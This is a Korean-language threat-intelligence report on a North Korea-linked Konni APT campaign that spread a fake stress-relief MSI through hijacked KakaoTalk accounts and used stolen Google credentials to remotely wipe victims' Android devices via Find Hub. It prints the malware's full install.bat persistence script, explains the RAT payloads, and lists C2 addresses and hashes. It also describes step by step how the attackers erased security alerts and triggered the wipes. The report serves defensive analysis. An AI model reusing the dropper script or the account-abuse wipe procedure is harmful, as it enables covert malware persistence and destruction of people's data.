지니언스 시큐리티 센터(Genians Security Center, GSC)는 김수키(Kimsuky) 또는 APT37 그룹과 연계된 것으로 알려진 코니(Konni) APT 캠페인의 새로운 공격 정황을 포착했습니다.
GSC는 코니 활동을 추적하는 과정에서, 한국의 카카오톡(KakaoTalk) 메신저를 통해 '스트레스 해소 프로그램'으로 위장한 악성파일이 대량으로 유포된 사실을 발견했습니다.
코니는 공격 대상 분야나 위협 인프라가 김수키 또는 APT37 그룹과 겹치는 경우가 있어 일부 연구자들은 동일 조직의 활동으로 분류하기도 합니다. 해당 그룹들은 모두 북한 정권의 지령을 받는 국가배후 위협 조직으로 알려져 있습니다.
한편, 2025년 10월 22일, 다국적 제재 모니터링팀(Multilateral Sanctions Monitoring Team, MSMT)은 '북한의 사이버 및 IT 근로자 활동과 관련된 보고서'를 발표하며 공동 성명서를 채택하였습니다. MSMT는 유엔 안전보장이사회(UNSC) 결의에 근거하여, 제재 조치의 위반 및 회피 행위를 감시하고 이를 국제사회에 보고하기 위해 설립된 다자간 협의체입니다.
MSMT 보고서에는 북한의 사이버 행위자 및 IT 근로자들이 유엔 제재 대상 기관과 맺고 있는 연계도가 포함되어 있으며, 63연구소(63 Research Center)를 중심으로 한 독립적 조직으로 김수키와 코니 그룹이 식별되어 있습니다.
[그림 1-1] 63연구소에 포함된 김수키와 코니 그룹 (출처 : MSMT)
최근 확인된 코니 캠페인에서는, 한국 내 구글 안드로이드 기반 스마트폰 및 태블릿 PC가 원격으로 초기화되어 기기에 저장된 개인 데이터가 복수의 사례에서 무단 삭제되는 피해가 발생한 점이 특히 주목됩니다.
데이터 파괴 공격에 악용된 구글 '내 기기 허브(Find Hub)' 서비스는 도난·분실된 안드로이드 기기를 보호하기 위해 제공되는 기능입니다. 그러나 국가 배후 위협 행위자가 탈취한 구글 계정을 통해 원격 제어 권한을 확보한 후, 기기 위치 추적 및 원격 초기화(Remote Wipe)를 수행한 최초 사례가 확인되면서, 해당 기능이 APT 캠페인에서 악용될 수 있는 현실적 위험으로 평가됩니다.
본 보고서는 북한과 연계된 것으로 추정되는 국가 배후 위협 조직이 Find Hub 계정을 탈취하여 정상적 관리 기능을 악용, 휴대기기를 원격으로 초기화한 최초의 공격 전술을 규명하는 것을 목적으로 합니다. 아울러 공격자가 피해자의 카카오톡 PC 세션을 악용해 가까운 지인들에게 악성파일을 유포한 연쇄 공격 시나리오를 분석하고, 이를 바탕으로 유사 위협에 대한 대응 방안 및 인텔리전스 인사이트를 제공합니다.
GSC는 지난해 7월 말, 「AutoIt 활용 방어 회피 전술의 코니 APT 캠페인 분석」 보고서를 공개한 바 있습니다.
당시 분석된 공격 시나리오에 따르면, 위협 행위자는 한국 국세청과 탈북민 학생 장학금 신청서 등의 사회공학적 테마를 활용하여 공격을 설계·실행한 사례가 상세히 소개됐습니다.
해당 공격으로 설치된 악성 스크립트는 피해 시스템에 은밀히 상주하며 장기간 잠복하고, 이 기간 동안 시스템 상태를 관찰하며 지속성 확보를 위한 내부 변경을 수행할 수 있습니다. 또한, 다수의 C2 서버와 통신하여 추가 악성 모듈을 몰래 설치함으로써 위협 행위자가 실시간으로 시스템 활동을 원격 감시·제어할 수 있는 환경을 구축합니다.
[그림 2-1] 공격 흐름도
EDR 등 행위 기반 이상행위 탐지가 없는 경우, 위협 행위자는 침투한 단말에 장기간 상주하며 이용자 정보 탈취와 웹캠을 통한 사생활 감시를 수행할 수 있습니다.
이 과정에서 초기 침투 단계에서 확보한 접근 권한을 활용하여 시스템 제어와 추가 정보 수집이 가능하며, 탐지 회피 전략을 통해 장기간 잠복할 수 있습니다.
국가 배후 위협 행위자는 웹캠을 악용하여 사용자의 주변 환경을 은밀히 모니터링하거나, 사용자의 부재 시점을 파악해 추가 공격을 수행할 수 있습니다.
특히 웹캠에 마이크가 내장된 경우 영상뿐 아니라 음성까지 수집 가능해 프라이버시 침해 범위가 크게 확대됩니다.
또한 동작 표시등(LED)이 없는 웹캠은 영상 스트림 활성화를 사용자가 인지하기 어려워 탐지가 한층 더 어렵고, 이에 따라 보안 위험이 증가합니다.
피해자 시스템이 온라인 상태이며 웹캠이 활성화된 상황에서 사용자가 자리를 비우면, 위협 행위자는 이를 통해 부재 여부를 확인한 뒤 자유롭게 원격 조작을 수행할 수 있습니다.
또한 탈취한 구글 계정 자격 증명과 Find Hub 관리 기능을 활용해 피해자의 실시간 위치(GPS 좌표)를 추적하고, 원격 초기화를 반복 실행하여 안드로이드 디바이스의 개인 데이터를 삭제함으로써 정상적인 사용을 방해합니다.
이로 인해 피해자는 모바일 기기로 주요 연락 및 알림 메시지를 수신하기 어려워지고, 위협 행위자는 장시간에 걸쳐 지속적인 공격을 수행할 수 있습니다.
보안 강화를 위해서는 동작 표시등이 포함된 웹캠 사용을 권장하며, 필요하지 않을 때는 물리적 커버로 카메라 렌즈를 차단해야 합니다.
아울러 하드웨어 차원의 마이크 차단 기능을 활용하고, 운영체제 및 애플리케이션에서 카메라·마이크 접근 권한을 철저히 관리하는 것이 필요합니다.
더불어 다음과 같은 후속 보안 조치를 검토·적용하여, 유사한 위협에 대비할 수 있는 정책을 강화합니다.
위협 행위자는 국세청 등을 사칭한 스피어 피싱 공격을 통해 특정인의 단말기에 침투한 뒤 장기간 내부 정찰과 정보 수집을 진행했습니다. 피해자 가운데는 탈북 청소년이 정착 과정에서 겪는 심리적 어려움을 해소하고, 진로·진학·멘토링 등 다양한 서비스를 통해 정서적 안정을 지원하는 전문 심리상담사도 포함되어 있었습니다.
또 다른 피해자는 국세청을 사칭한 이메일을 열람하고 첨부된 악성파일을 실행했으나, 곧 잘못 발송된 메일이라는 회신을 받고 대수롭지 않게 여기며 지나친 사례도 있었습니다.
이러한 사례는 스피어 피싱 공격이 피해자를 속이기 위해 얼마나 교묘하고 적극적인 수법을 동원하는지를 보여주며, 각별한 주의가 필요함을 시사합니다.
[그림 3-1] 이메일 발송 오류 안내로 사칭한 화면
또한, 국세청 사칭을 통해 유포된 악성파일이 피해자 시스템에서 실행된 정황이 다수 확인되었습니다. 특히 '탈세제보 신고에 따른 소명자료 제출 요청 안내.zip' 파일의 다운로드 내역을 비롯한 다양한 아티팩트가 식별되었으며, 이를 통해 공격자의 초기 침투 절차를 구체적으로 추적할 수 있었습니다.
본 보고서는 국세청 사칭 스피어 피싱 공격에 노출된 일부 피해자 단말을 심층 조사하고 디지털 포렌식 분석한 결과를 다룹니다. 분석 결과, 피해 단말은 단순 1차 피해에 그치지 않고 공격 인프라의 일부로 전환되어, 카카오톡을 통한 2차 악성파일 전파 매개체로 악용된 사실이 확인되었습니다.
이는 공격자가 사회적 신뢰 기반 서비스를 전략적으로 활용하여 공격 효과를 극대화했음을 시사하며, 공격의 전술적 정교함과 은닉 전략의 고도화를 보여주는 사례로 평가됩니다.
[그림 3-2] 카카오톡을 통한 악성파일 유포 사례들
조사 결과, 9월 5일 오전 위협 행위자가 한국 내 탈북 청소년 전문 심리상담사의 카카오톡 계정을 탈취·악용하여 실제 탈북민 학생에게 '스트레스 해소 프로그램'으로 위장한 악성파일을 전송한 사실이 확인되었습니다. 수신자가 해당 파일을 실행함에 따라 일부 단말에서 감염이 발생하였고, 이에 대한 후속 대응 조치가 수행되었습니다.
이후 불과 열흘 만인 9월 15일, 또 다른 피해자의 카카오톡 계정을 통해 악성 파일이 동시다발적으로 대량 유포되는 사건이 발생했습니다.
본 공격은 신뢰 기반 커뮤니케이션을 활용해 표적의 심리·사회적 맥락을 정밀히 공략한 전형적인 사회공학 공격으로 평가됩니다. 특히 메신저 플랫폼 계정 탈취 및 이를 2차 공격 벡터로 악용한 점은 공격의 맞춤화 수준을 높이는 동시에 공격 표면과 전파 범위를 확장하여 위협을 한층 증대시켰습니다.
주목할 점은, 위협 행위자가 Find Hub 위치 기반 조회를 통해 피해자가 외부에 있음을 확인한 직후 피해자의 안드로이드 단말(스마트폰·태블릿)에 원격 초기화 명령을 실행한 사실입니다. 원격 초기화는 단말의 정상 동작을 정지시키고, 메신저 앱 등의 푸시 알림·메시지 확인 등 계정 소유자의 인지 경로를 봉쇄하여 탐지와 대응을 지연시켰습니다. 이후 공격자는 탈취한 카카오톡 계정을 2차 전파 채널로 악용해, 원격 초기화 직후 악성 파일을 대량 확산시킴으로써 은닉과 확산을 동시에 달성했습니다.
이처럼 단말 무력화와 계정 기반 전파를 결합한 공격은 기존 국가 배후 APT 공격 시나리오에서 전례가 없으며, 본 보고서를 통해 최초로 식별·분석된 사례입니다. 이는 공격의 전술적 성숙도와 탐지 회피 전략의 고도화를 입증하는 동시에, APT 전술 진화의 분기점을 보여주는 핵심 지표로 판단됩니다.
초기 침투에 성공한 위협 행위자는 장기간 내부 정찰과 원격 모니터링을 수행하며, 이 과정에서 피해자의 민감 정보와 주요 계정 자격증명을 수집·탈취하여 Google 및 Naver 계정의 접근 권한을 확보합니다.
확보한 자격증명을 바탕으로 계정에 대한 지배권을 획득한 뒤, Find Hub의 관리 기능을 악용하여 휴대 기기의 원격 초기화 등 파괴적 조치를 실행할 수 있습니다. 디지털 포렌식 및 아티팩트 분석을 통해 시간 순(Timeline)으로 정렬된 위협 행위자의 일부 접근 주소는 중복 등을 제거했을 때 다음과 같습니다.
[그림 3-3] 시간대별 원격 초기화 작업 기록
위협 행위자는 먼저 구글 지메일에 로그인한 후, [계정 활동 세부정보] 페이지에서 최근 로그인 세션 기록을 확인했습니다.
그 다음 [구글 계정 관리] 페이지에 접속하여 [보안] 메뉴를 선택하고, 복구 이메일로 등록된 네이버(NAVER) 주소를 확인했습니다. 이어 해당 계정에 로그인하여 구글에서 발송된 보안 경고 메일을 삭제하고 휴지통 기록까지 모두 지우는 등, 활동 흔적을 남기지 않기 위해 치밀하고 계획적으로 조치를 취했습니다.
이후 구글 [보안] 메뉴 내 [내 기기] 항목의 [분실 기기 찾기(Find My Phone)] 링크로 이동했습니다. 등록된 스마트폰 또는 태블릿을 선택하면 [내 기기 허브(Find Hub)] 서비스로 연결되며, 등록된 스마트 기기에 대해 다양한 원격 명령을 수행할 수 있습니다.
[그림 3-4] Find Hub에 등록된 스마트폰과 태블릿 기기 예시
위협 행위자는 등록된 안드로이드 기반 스마트폰과 태블릿을 대상으로 원격 초기화 명령을 실행했습니다. 이 과정에서 구글 비밀번호를 한 번 더 입력하여 초기화 작업(Device Wipe Action)이 정상적으로 진행되었으며, 해당 기기에 저장된 주요 데이터가 모두 삭제되는 피해가 실제로 발생했습니다.
[그림 3-5] 기기 초기화 명령을 수행하는 모습
기기 초기화 완료 후에도 위협 행위자는 동일한 원격 초기화 명령을 3회 이상 반복 전송하여, 대상 스마트 기기의 정상적인 복구 및 사용을 장시간 교란·저해함으로써 가용성에 영향을 미쳤습니다. 그 시점에 피해자의 로그인된 카카오톡 PC 버전에 접근해 악성파일 유포의 매개체로 악용했습니다.
[그림 3-6] 기기 초기화 및 후속 공격 수행
본 APT 공격으로 인해 피해자는 단순한 정보 유출을 넘어, 복수의 단말 기기에 걸친 심각한 피해를 입은 것으로 확인되었습니다.
[영상 3-1] 초기화 시연 장면
카카오톡 메시지를 통해 유포된 다수의 'Stress Clear.zip' 파일은 입수된 모든 샘플에서 동일한 구조를 갖는 것으로 확인되었습니다. 압축파일 내부에는 'Stress Clear.msi'라는 이름으로 위장된 Microsoft Installer(MSI) 설치 패키지가 포함되어 있습니다.
해당 MSI 파일에는 중국의 'Chengdu Hechenyingjia Mining Partnership Enterprise' 명의의 유효한 디지털 서명이 포함되어 있습니다. 이러한 서명은 파일의 출처 및 무결성 검증을 통해 마치 정상파일처럼 위장하기 위한 코드사인 남용 전술입니다.
[그림 4-1] 'Stress Clear.msi' 내부 구조 모습
'Stress Clear.msi' 파일은 Windows 운영체제 기반 환경에서만 실행 가능하며, 스마트폰 등 비호환 플랫폼에서는 실행이 불가능하므로 감염 대상에서 제외됩니다. 만약 동작 가능한 환경에서 파일을 실행할 경우, 표준 MSI 설치 과정 GUI가 나타나며, 사용자가 인지하지 못하는 상태에서 설치 루틴 내 악성 행위가 수행됩니다.
악성 MSI가 실행되면 패키지 내부에 포함된 install.bat 배치파일과 error.vbs 스크립트를 ActionID 값에 따라 순차 호출하도록 구성되어 있습니다.
동작 흐름은 대략 다음과 같습니다. 참고로, 정상적인 금융 보안 모듈 일부가 포함되어 있지만, 실제 동작에는 영향을 주지 않습니다.
실행 시 화면에 표시되는 각 메시지는 다음과 같이 나타나며, 한국어로 된 스트레스 클리어 프로그램 설치 안내와 언어팩 호환 문제로 위장한 가짜 오류 메시지입니다.
[그림 4-2] 악성파일 실행 과정에서 보여지는 화면
실행되는 각 파일의 구체적인 커맨드와 내용은 다음과 같습니다.
| @echo off set dr=Music copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3 cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe & hwpviewer /delete /tn "IoKlTr" /f & hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3" del /f /q "%~dp0AutoIt3.exe" del /f /q "%~dp0IoKlTr.au3" del /f /q "%~f0" |
[표 4-1] install.bat 스크립트 명령어
BAT 파일 명령은 공용 음악 경로(%PUBLIC%\Music)에 'AutoIt3.exe'과 'IoKlTr.au3' 스크립트를 복사합니다.
이어서 작업 스케줄러 구성 도구(Task Scheduler Configuration Tool) 원본인 'schtasks.exe' 파일을 'hwpviewer.exe' 이름으로 복사합니다.
그리고 스케줄러 작업을 생성(1분 주기 실행)하여 지속적으로 악성 AutoIt 스크립트를 실행합니다.
그 다음 원본 배치와 소스 파일을 삭제하여 흔적을 최소화합니다. 이는 전형적으로 악성코드 지속성 확보 및 증거 은닉(자가 삭제, 원본 삭제, 문서 뷰어 사칭)을 목적으로 하는 동작입니다.
| MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _ "설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _ vbCritical, "언어팩 오류" |
[표 4-2] error.vbs 스크립트 명령어
VBS 파일 명령은 사용자 화면에 '언어팩 오류'라는 제목의 경고 창(메시지 박스)을 표시합니다. 코드 자체에는 악성 행위가 포함되어 있지 않으며, 주로 허위 오류창을 통해 프로그램이 정상 작동하지 않는 것으로 인식하도록 유도하는 위장용 메시지로 활용됩니다.
작업 스케줄러에 의해 주기적으로 실행되는 'IoKlTr.au3' AutoIt 스크립트는 시스템 내에서 지속적인 악성 행위를 수행하도록 설계된 핵심 구성요소입니다.
이 스크립트는 일정한 주기로 로드되며 추가 명령을 실행하거나 악성 페이로드를 유지·갱신하는 역할을 합니다.
또한 탐지·분석을 방해하기 위해 실제 실행 흐름과 무관한 불필요한 코드를 스크립트의 앞뒤에 삽입하여 악성 로직을 은닉합니다.
[그림 4-3] 컴파일된 오토잇 스크립트 내부 코드 모습
내부 코드를 검토한 결과, 대상 파일은 컴파일된 AutoIt 스크립트 구조를 갖추고 있으며 디컴파일을 통해 실제 명령어를 복원·확인할 수 있습니다. 이와 관련된 상세 분석은 앞서 배경에서 언급한 「AutoIt 활용 방어 회피 전술의 코니 APT 캠페인 분석」 보고서를 참고하십시오.
대상 코드는 AutoIt 기반 LilithRAT과 일부 비슷하지만 변형된 형태로 endClient9688 JSON 마커를 사용하며, 명령·제어(C2) 연결은 독일 소재 도메인을 통해 이루어집니다. 해당 도메인은 WordPress로 구축되어 있으며 현재 접속 시 유지보수 안내가 표시됩니다. 그래서 EndRAT으로 분류되기도 합니다.
과거 유사 캠페인에서 다수의 C2 서버가 WordPress 기반 호스팅을 사용한 것으로 관찰된 바, 위협 행위자는 보안 취약 가능성이 높은 WordPress 웹 서버를 반복적으로 악용하여 C2 인프라를 운영하는 것으로 판단됩니다.
[그림 4-4] 디컴파일된 스크립트
공격 기법의 일환으로, 중복 실행 방지를 위한 뮤텍스(Mutex)와 시스템 재시작 시 자동 실행되도록 시작 프로그램에 등록되는 바로가기(shortcut) 형태의 악성파일(.lnk)이 사용되며, 이 파일들은 일부 변형되어 배포됩니다.
실제로 과거 사례에서는 해당 바로가기 파일명이 'Start_Web.lnk' 이였으나, 이번 사례에서는 'Smart_Web.lnk' 이름으로 변경되었습니다.
디지털 포렌식 및 침해사고 대응(DFIR:Digital Forensics and Incident Response) 프로세스에 따라 다수의 추가 증거를 확보하였습니다. 참고로 DFIR 프로세스는 일반적으로 다음과 같이 진행됩니다.
2025년 9월 5일에 카카오톡 메신저를 통해 유포된 MSI 파일을 다운로드 및 실행한 일부 피해자 PC를 대상으로 디지털 포렌식 조사를 수행하였습니다.
조사 결과, 해당 시스템에서 다수의 추가 악성파일이 설치된 정황이 확인되었으며, 이에 따라 관련 자료에 대한 채증 절차를 실시하였습니다.
수집된 증거는 악성코드 유형 식별 및 침해 범위 파악을 위한 심층 분석에 활용되었습니다.
[그림 5-1] 추가 악성파일 채증 화면
피해자 단말에서 C2 서버를 통해 추가로 다운로드된 것으로 추정되는 다수의 악성파일이 확인되었습니다.
해당 파일에는 기본적으로 악성 AutoIt 스크립트와 함께 원격 제어(Remote Access) 및 키로깅(Keylogging) 기능을 수행하는 모듈이 포함되어 있는 것으로 분석되었습니다.
위협 행위자는 다양한 악성코드를 AutoIt 스크립트 내부에 인코딩 또는 암호화하여 은닉하는 기법을 활용하였으며, 이는 보안 제품의 탐지 회피 및 악성 행위 분석 지연을 유도하기 위한 전략으로 판단됩니다.
지니언스 시큐리티 센터(GSC)는 지난 4월 초, 「경찰청 및 국가인권위를 사칭한 Konni APT 캠페인 분석」 보고서를 상세하게 공개한 바 있습니다.
당시 경찰청 수사관을 사칭해 사용된 스피어 피싱 공격에서는 북한어 표현이 다수 식별되었습니다. 예를 들어, '인차'는 '곧' 또는 '즉시'를 의미하는 표현으로, 특정 행위가 임박했음을 나타낼 때 사용됩니다. 또한 '태공'은 '태업(게으르게 일함)'을 뜻하는 북한식 표현으로 확인되었습니다.
위협 행위자들은 모국어의 노출을 최소화하기 위해 언어 사용에 주의를 기울이지만, 평소 습관적인 표현이 무의식적으로 드러나는 경우가 있습니다. 이러한 언어적 특징은 위협 행위자의 국적 또는 활동 지역을 추정하고, 공격 그룹의 귀속 분석을 수행하는 데 중요한 단서로 활용될 수 있습니다.
경찰청 사칭 공격에서는 '악성코드 진단(멀웨어 제로) - 설치 파일.msi'라는 이름의 악성파일이 사용되었습니다. 이 파일은 'IoKlTr.au3' 스크립트를 작업 스케줄러에 등록하여 주기적으로 자동 실행되도록 설정되어 있었습니다.
한편, 카카오톡 메신저를 통해 공격된 'Stress Clear.msi' 파일에서도 동일한 이름의 'IoKlTr.au3' 스크립트가 사용되어, 두 공격 간 유사한 전술 및 기법이 활용된 정황이 확인되었습니다.
아울러 각 MSI 파일은 공통적으로 EMCO Software의 MSI Package Builder(버전 11.2.6 및 11.2.8)를 사용해 제작되었습니다.
[그림 6-1] MSI 패키지 파일 빌더 버전 비교
위협 행위자는 AutoIt 스크립트를 활용해 RemcosRAT(Remote Access Trojan)이 실행되도록 구성했습니다.
참고로 RemcosRAT은 2016년 7월 1.0 버전이 최초 공개된 이후 지속적으로 업데이트되고 있으며, 2025년 9월 기준 최신 버전은 7.0.4 입니다. 이 악성코드는 상용 버전으로 판매되고 있어, 위협 행위자들이 손쉽게 입수해 공격에 활용할 수 있습니다.
또한, 일부 피해자 시스템에서는 RemcosRAT 7.0.4 Pro 버전이 식별되었으며, 이를 통해 위협 행위자들이 최신 버전의 악성코드와 전술을 적극적으로 활용하고 있음이 확인되었습니다.
[그림 6-2] 오토잇 스크립트 내부 문자열
수집된 AutoIt 스크립트 분석을 통해 내부 폴더 구조 일부가 식별되었으며, 이는 공격 인프라와 개발 환경 추적에 유의미한 단서로 평가됩니다.
또한, 악성코드 제작에 사용된 경로명에 '공격 무기(Attack Weapon)'라는 표현이 포함된 점은 위협 행위자의 의도가 사이버 공격 무기 및 작전 계획임을 추정할 수 있는 근거가 됩니다.
이 폴더 구조는 앞서 배경에서 언급한 「AutoIt 활용 방어 회피 전술의 코니 APT 캠페인 분석」 보고서에서 언급된 경로와 일치합니다.
참고로, 2025년 10월 23일 국세청의 '미신고 자금출처 소명자료 제출 요청안내'로 위장해 유포된 악성파일에서 다음과 같은 경로가 추가로 식별되었습니다.
피해자 단말에는 LilithRAT, RemcosRAT 외에도 AutoIt 스크립트에 은닉되어 실행되는 다양한 변종 RAT 모듈이 확인되었습니다. 대표적인 유형은 다음과 같습니다.
이 파일들은 C2에서 받아진 것으로, [%APPDATA%\Google\Browser] 디렉터리의 하위경로 중 'adb' 또는 'adv' 문자가 포함된 폴더에 생성합니다. 수신된 'autoit.vbs'와 'install.bat' 스크립트가 각각 해당 위치에서 AutoIt 기반 실행을 수행합니다.
'sqlite3.au3' 스크립트에는 #AutoIt3Wrapper_Outfile_type=a3x 지시문이 포함되어 있어 컴파일러 래퍼를 통해 빌드된 흔적이 확인됩니다.
해당 스크립트는 HMAC 구조 기반의 해시 유도 과정을 통해 AES 복호화 키를 생성하고, 이를 사용해 AES로 암호화된 페이로드를 복호화합니다.
복호화된 모듈은 C#으로 작성된 'QuasarRAT'이며, 'hncfinder.exe' 프로세스에 인젝션되어 실행됩니다. 이 과정에 사용된 패스워드 문자열은 다음과 같습니다.
[그림 6-3] sqlite3.au3 디코딩 과정
분석 결과, QuasarRAT은 네덜란드 소재의 212.118.52[.]168 C2 서버와 통신을 시도하며, 후속 명령 수신을 위해 지속적으로 연결을 유지하는 동작을 합니다. 참고로 Quasar 프로젝트는 초기 배포 시점에 xRAT라는 이름으로 공개되었으며, 깃허브 기록에는 2015년 8월경 v1.0.0.0 릴리스와 함께 이름을 'Quasar'로 전환한 것으로 확인됩니다.
[그림 6-4] QuasarRAT C2 서버 주소 분석 모습
다음으로 'cliconfg.au3' 스크립트 역시 #AutoIt3Wrapper_Outfile_type=a3x 지시문을 포함합니다.
해당 스크립트도 'sqlite3.au3'와 동일하게 HMAC 기반의 해시 유도를 거쳐 AES 복호화 키를 생성하고, 이 키로 AES로 암호화된 페이로드를 복호화합니다.
복호화된 실행 모듈은 RFTServer(통칭 RftRAT)로 분류되며, 'cleanmgr.exe' 프로세스에 인젝션되어 실행됩니다. 이 과정에 사용된 패스워드 문자열은 다음과 같습니다.
[그림 6-5] cliconfg.au3 디코딩 과정
분석 결과, RftRAT은 일본 소재의 38.180.148[.]108 C2 서버와 통신을 시도하며, 후속 명령 수신을 위해 지속적으로 연결을 유지하는 동작을 합니다.
RtfRAT은 복잡한 암호화 대신 단순한 산술적 난독화(subtractive obfuscation) 기법을 사용했으며, data 문자열을 키로 이용해 실제 C2 서버 주소가 노출되지 않도록 숨긴 형태입니다.
[그림 6-6] RftRAT C2 서버 주소 분석 모습
기존에 공개된 지니언스 및 안랩의 분석자료에 따르면, RftRAT은 한국을 대상으로 한 지속적이고 은밀한 위협 캠페인에 활용되고 있습니다.
RftRAT은 글로벌 위협 분석 보고서에서는 찾아보기 어렵습니다. 이는 해당 악성코드가 한국 지역에 특화된 공격 도구임을 시사하며 동시에 관련 데이터 확보와 심층 분석에 많은 노력이 필요함을 의미합니다.
피해자 단말 및 유사 악성코드에서 추출된 침해지표를 상호 연관 분석한 결과, 지표들이 단일 코니 캠페인으로 수렴하는 강한 연관성이 확인되었습니다.
[그림 6-7] 위협 인프라 연관 관계도
위협 행위자는 워드프레스 기반 호스팅을 거점 인프라로 악용하고, 러시아·미국·독일 등에 호스팅된 1차 C2 노드를 활용한 것으로 확인되었습니다.
또한 일본·네덜란드 등 제3국 서버를 RAT 계층의 중계 노드로 배치하여, 지리적 분산과 다단계 중계를 통해 수사기관의 로그 및 소스 IP 추적을 회피·지연시키는 전술을 사용했습니다.
악성 MSI 파일이 실행되면, 패키지 내부에 포함된 install.bat 배치 파일이 자동으로 호출되어 후속 명령을 수행합니다. Genian EDR 이벤트 분석 결과, 해당 스크립트는 공용 음악 폴더(C:\Users\Public\Music) 경로에 AutoIt3.exe 실행 파일과 IoKlTr.au3 스크립트를 복사하는 행위를 수행하는 것으로 확인되었습니다.
이러한 일련의 동작 과정은 EDR에서 프로세스 생성(CreateProcess), 파일 생성(FileCreate), 파일 복사(FileWrite) 등의 이벤트로 수집되며, 이를 통해 시간 순(Time-line) 기반 행위 추적이 가능합니다. 분석자는 해당 이벤트 로그를 통해 MSI 실행 시점부터 배치 파일 실행, 파일 복사까지의 연쇄적인 행위 흐름(Execution Chain) 을 확인할 수 있습니다.
[그림 7-1] Genian EDR 위협 관리 화면
MSI 확장자 악성파일이 실행되면 MsiExec.exe 프로세스에 의해 실행되어 패키지 내부의 파일들을 생성하고 install.bat 등 배치 파일을 호출해 악성 스크립트를 실행하는 것으로 관찰됩니다.
이 전체 실행 흐름은 EDR의 명령행(command line) 이벤트 로그를 조회하면 빠르게 식별할 수 있으며, 이를 통해 보안 관리자는 위협을 조기에 탐지하고 대응할 수 있습니다.
[그림 7-2] MsiExec.exe 커맨드 라인 모습
AutoIt 프로세스의 실행 경로와 동작 흐름을 추적하면, 지속성(persistence) 확보를 위한 Smart_Web.lnk 바로가기의 세부정보(대상 경로)를 빠르게 확인할 수 있습니다.
아울러 프로세스 로그를 통해 해당 샘플이 접속하는 C2 IP 및 도메인을 식별할 수 있으며, 이 정보를 이용해 내부 정보 유출을 차단하는 방화벽 규칙, EDR 차단 룰, 또는 네트워크 세그멘테이션 정책을 신속히 배포할 수 있습니다.
[그림 7-3] Genian EDR 공격 스토리 라인
Genian EDR의 공격 스토리 라인은 악성코드의 전체 실행 흐름을 시계열·관계형으로 가시화하여, SOC 운영자가 프로세스 트리·명령행·파일·레지스트리·네트워크 이벤트를 한눈에 파악하고 즉시 우선순위화·격리·차단·포렌식 수집 등 대응 절차를 실행할 수 있도록 지원합니다.
EDR은 엔드포인트에서 발생하는 모든 행위를 실시간으로 수집·분석하여 악성 행위의 전체 흐름을 가시화하고, 자동 대응 기능을 통해 공격 확산을 신속히 차단함으로써 기업과 기관이 보안 위협에 효과적으로 대응할 수 있도록 지원합니다.
또한 포렌식 분석과 위협 인텔리전스 연계를 통해 침해사고의 원인 규명, 재발 방지, 내부 정보 유출 차단 등 종합적인 보안 관리 체계를 구축할 수 있게 하며, 고도화되는 사이버 공격 환경에서 기존 백신·방화벽만으로는 탐지되지 않는 위협에 대응하기 위해 EDR의 도입은 필수적입니다.
5ab26df9c161a6c5f0497fde381d7fca
8f82226b2f24d470c02f6664f67f23f7
09b91626507a62121a4bdb08debb3ed9
25e38d618f38b3218c3252cf0d22c969
38f8fd9e8d27ae665b3ac0f56492f6c4
048e1698c4b711d1652df4bf4be04f9e
53aea290d7245ee902a808fd87a6a173
56c7b448dbc37aa50eb1c2a6475aca5e
99ee7852b8041a540fdb74b3784d0409
8230af6642f5f1927bbbbc7fd6e5427f
b0eba111b570bb1c93ca1f48557d265b
ef1a8f66351d03413ed2c7d499ee5164
f7363c5cfd6fa24a86e542fcd05283e8
f6800836d55d049fe79e3d47d54e1119
appoitment.dotoit[.]media
genuinashop[.]com
oldfoxcompany[.]com
professionaltutors[.]net
sparkwebsolutions[.]space
xcellentrenovations[.]com
youkhanhdoit[.]co
116.202.99[.]218
192.109.119[.]113
212.118.52[.]168
38.180.148[.]108
62.113.118[.]157
77.246.101[.]72
77.246.108[.]96
89.110.83[.]245
91.107.208[.]93
93.183.93[.]185
94.103.87[.]212
109.234.36[.]135